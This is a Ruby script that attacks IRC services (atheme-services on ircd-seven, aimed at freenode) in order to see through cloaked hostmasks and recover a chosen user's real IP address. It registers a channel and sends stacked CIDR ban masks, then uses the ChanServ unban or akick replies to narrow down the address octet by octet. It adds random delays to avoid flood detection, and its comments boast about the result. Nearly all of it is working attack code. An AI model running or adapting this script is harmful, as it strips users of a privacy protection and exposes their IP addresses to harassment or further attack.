#!/usr/bin/env ruby # encoding: utf-8 # # See through cloaked client hostmasks and virtual hosts enabled by HostServ or ircd.conf. # # Target: atheme-services # Tested on: ircd-seven # # NO! I didn't use the cinch gem; don't panic--I'm fluent in raw IRC. # require 'socket' module Cloak DEBG = true # Print debugging messages? WARN = true # Display warning info? ALTN = 1 # Number of alternate technique to use {:0 => default, :1 => AKICK } # Initialize hashed configuration data storage constants ERRO,CONF,CHAT,SVCS = {},{},{},{} SVCS[:mail] = 'hotmail.com' # Note: FreeNode's NickServ does not allow registration of e-mails from mailinator.com SVCS[:pass] = 'W4tchW0rd' # Numeric reply assignments REPL = {:USERHOST=>302,:NAMREPLY=>353,:ENDOFNAMES=>366,:ENDOFMOTD=>376} # Numeric error assignments ERRO[:NICKNAMEINUSE] = 433 ABBR = true # false to expand 'CS' and 'NS' abbreviations to an RFC-compliant PRIVMSG command CHAT[:nick] = 'xyz0' CHAT[:host] = 'irc.freenode.net.' CHAT[:port] = '6667' CHAT[:duck] = 'beo' CHAT[:user] = 'msftwin' CHAT[:gcos] = '*Unknown*' CHAT[:chan] = '##xyz0' CHAT[:quit] = 'cya!' CHAT[:trgc] = '#tcmd' ############################################################################ # DO NOT CHANGE ANYTHING BELOW THIS LINE UNLESS YOU KNOW WTF YOU'RE DOING! # ############################################################################ def vexit(enum, aexc) STDERR.puts "#{afil}:#{alin} #{aexc}" STDERR.puts aexc.backtrace.join("\n") if DEBG exit enum end def ioerr(afil, alin, astr) return IOError.new('') if afil.nil? or afil.empty? astr.strip! if astr if alin.nil? or alin.zero? if astr.nil? or astr.empty? IOError.new("(#{afil}) ERROR!") else IOError.new("(#{afil}) ERROR: #{astr}!") end else if astr.nil? or astr.empty? IOError.new("(#{afil}:#{alin}) ERROR!") else IOError.new("(#{afil}:#{alin}) ERROR: #{astr}!") end end end class Clone BANS = [' *!*@ *!*@ *!*@ *!*@'] # 1st CIDR block-based ban stack string DOT4 = ['.', '.', '.', ''] # auxiliary IPv4 dotted-quad array INIT = [[0, 64, 128, 192], [2, 10, 18, 26]] # Initial /30 chunks and in-order per-byte CIDR bit increments CIDR = [256, 128, 64, 32, 16, 8, 4, 2, 1, 0] # 2**8 countdown MASK = ' *!*@' # "nick!user@" initial part of ban mask attr_reader :nick, :user, :mail, :gcos, :chan, :duck, :quit, :host, :port def ucputs(astr = '') return nil if !(astr and astr.size > 0) astr.strip! sleep rand 0.32 if ABBR sleep(0.84 + rand(1.44 + rand(1.22))) if rand(3).even? else astr.sub!(%r{^CS}i, 'PRIVMSG ChanServ :') if astr.upcase.start_with?('CS') astr.sub!(%r{^NS}i, 'PRIVMSG NickServ :') if astr.upcase.start_with?('NS') sleep(1.2 + rand(1.8 + rand(1.4))) if rand(4).even? end # if ABBR printf('%02d ', @arnd) puts "[#{Time.now.asctime}] #{astr}" @sock.puts astr end # def ucputs def getout(qmsg = 'Leaving') begin ucputs("QUIT #{qmsg}") @sock.close rescue Exception => e STDERR.puts e.inspect STDERR.puts e.backtrace.join("\n") if DEBG exit -1 end exit 1 end # SnAp y0 FiNGaZ! def initialize(aduq = '') #['TERM','INT'].each { |s| Signal.trap(s) { getout("Caught SIG#{s}!") } } @arnd = rand(Time.now.sec % 32).to_s @chan,@host,@port = CHAT[:chan].downcase,CHAT[:host],CHAT[:port].to_i @amod = "MODE #{@chan} +bbbb" # Raw IRC quad-stacked CMODE +b command bootstrap vexit(-2, ioerr(__FILE__, __LINE__, "Invalid port #{CHAT[:port]}")) if @port <= 0 or @port > 65535 @sock = TCPSocket.new(@host, @port) STDERR.puts '[%] Connected!' if DEBG @nick,@user = CHAT[:nick].downcase, CHAT[:user].downcase @mail,@gcos,@pass = SVCS[:mail],CHAT[:gcos],SVCS[:pass] @duck,@quit = CHAT[:duck],CHAT[:quit] @duck = aduq if !aduq.empty? ucputs "NICK #{@nick}" ucputs "USER #{@user} . . :#{@gcos}" loop do begin aline = @sock.readline aline.rstrip! printf('%02d ', @arnd) puts("[#{Time.now.asctime}] #{aline}") if aline.include?(" #{ERRO[:NICKNAMEINUSE]} ") ucputs("NICK #{@nick << rand(9).to_s}") STDERR.puts s = '!NICKNAMEINUSE' next end break if aline.include?(" #{REPL[:ENDOFMOTD]} ") rescue Exception => e STDERR.puts e.inspect STDERR.puts e.backtrace.join("\n") if DEBG end # begin end # loop do ucputs "NS REGISTER #{@pass} #{@user}@#{@mail}" # if ALTN != 1 ucputs "NS ID #{@nick} #{@pass}" ucputs "CS SET #{@chan} MLOCK OFF" sleep 2 ucputs "JOIN #{@chan} #{@ckey}" ucputs "CS CLEAR #{@chan} BANS" ucputs "USERHOST #{@duck}" sleep 2 ucputs "CS REGISTER #{@chan}" # if ALTN != 1 ucputs "CS OP #{@chan} #{@nick}" ucputs "MODE #{@chan} +nsti" sleep 2 ### CAWSHUN: K0ADZ 4 EWEET IRC WARRI0RZ _ONLY_ @abit,@aoct,@anum,@anip = 2,0,-1,['0','0','0','0'] @aban,@umsk = @amod.dup,nil @aban << BANS.first ucputs @aban if ALTN == 1 ucputs "CS AKICK #{@chan} ADD #{@duck} !P" ucputs "CS AKICK #{@chan} DEL #{@duck}" else ucputs "CS UNBAN #{@chan} #{@duck}" end loop do begin aline = @sock.readline aline.rstrip! printf('%02d ', @arnd) puts "[#{Time.now.asctime}] #{aline}" aline.downcase! if aline.start_with?('ping') ucputs("PONG #{aline.split.last}") next end if aline.include?(" #{REPL[:USERHOST]} ") @umsk = aline.split(':').last next end if aline.start_with?(':chanserv!') and aline.include?(" mode #{@chan} -b") bnstr = aline.split('-b').last.split('/').first bnstr.gsub!(%r{[ *!@]+}, '') @aban,@anum = @amod.dup,bnstr.split('.')[@aoct].to_i @anip[@aoct] = @anum.to_s if !((@abit % 8).zero?) @abit += 1 4.times do |t| @aban << MASK STDERR.puts "HERE: @anum: #{@anum} t: #{t} @aoct: #{@aoct}" if DEBG case @anum when 0 0.upto(3) do |j| if j == @aoct @aban << (@anum + CIDR[@abit] * t).to_s else @aban << @anip[j] end @aban << DOT4[j] end when 256 0.upto(3) do |m| if m == @aoct @aban << (@anum - CIDR[@abit] * t).to_s else @aban << @anip[m] end @aban << DOT4[m] end else STDERR.puts "WHERE: @anum = #{@anum} t = #{t} @aoct = #{@aoct}" if DEBG 0.upto(3) do |n| if n == @aoct @aban << (@anum + CIDR[@abit] * t).to_s else @aban << @anip[n] end @aban << DOT4[n] end # 0.upto(3) end # case @anum @aban << "/#{@abit + 8 * @aoct}" end # 4.times else # if !((@abit % 8).zero?) @abit = 2 @aoct += 1 if @aoct == 4 #$# PHULL PJEERNESS #%# qwnzed teh full addr!1!*wO0p!*wO0p!*PuLL oVeR m0FO!@# #%# *w0Op!*wO0p!*Krad9 unit pig tail-n ewe phewlz!*w0Op!*w00p!* #$# PHULL PJEERNESS puts "*** <#{CHAT[:duck]}:#{CHAT[:trgc]}> => #{@umsk} => #{bnstr}" ucputs("CS CLEAR #{@chan} BANS") ucputs("QUIT #{@quit}") @sock.close return bnstr end 4.times do |z| STDERR.puts "THERE: @abit = #{@abit} @aoct = #{@aoct} z = #{z} @aban = #{@aban}" if DEBG @aban << MASK for i in 0 .. 3 if i == @aoct @aban << INIT.first[z].to_s else @aban << @anip[i] end @aban << DOT4[i] end @aban << "/#{@abit + 8 * @aoct}" end # 4.times @abit += 1 end # else ucputs @aban if ALTN == 1 ucputs "CS AKICK #{@chan} ADD #{@duck} !P" ucputs "CS AKICK #{@chan} DEL #{@duck}" else ucputs "CS UNBAN #{@chan} #{@duck}" end end # if aline.include? rescue Exception => e STDERR.puts e.inspect STDERR.puts e.backtrace.join("\n") if DEBG end # begin end # loop do true end # def initialize end # class end # Module Cloak include Cloak # Invokes main initialize method in the Clone class of the Cloak module athr = Thread.new { Clone.new(CHAT[:duck]) } aret = athr.join STDERR.puts aret.inspect if WARN exit 0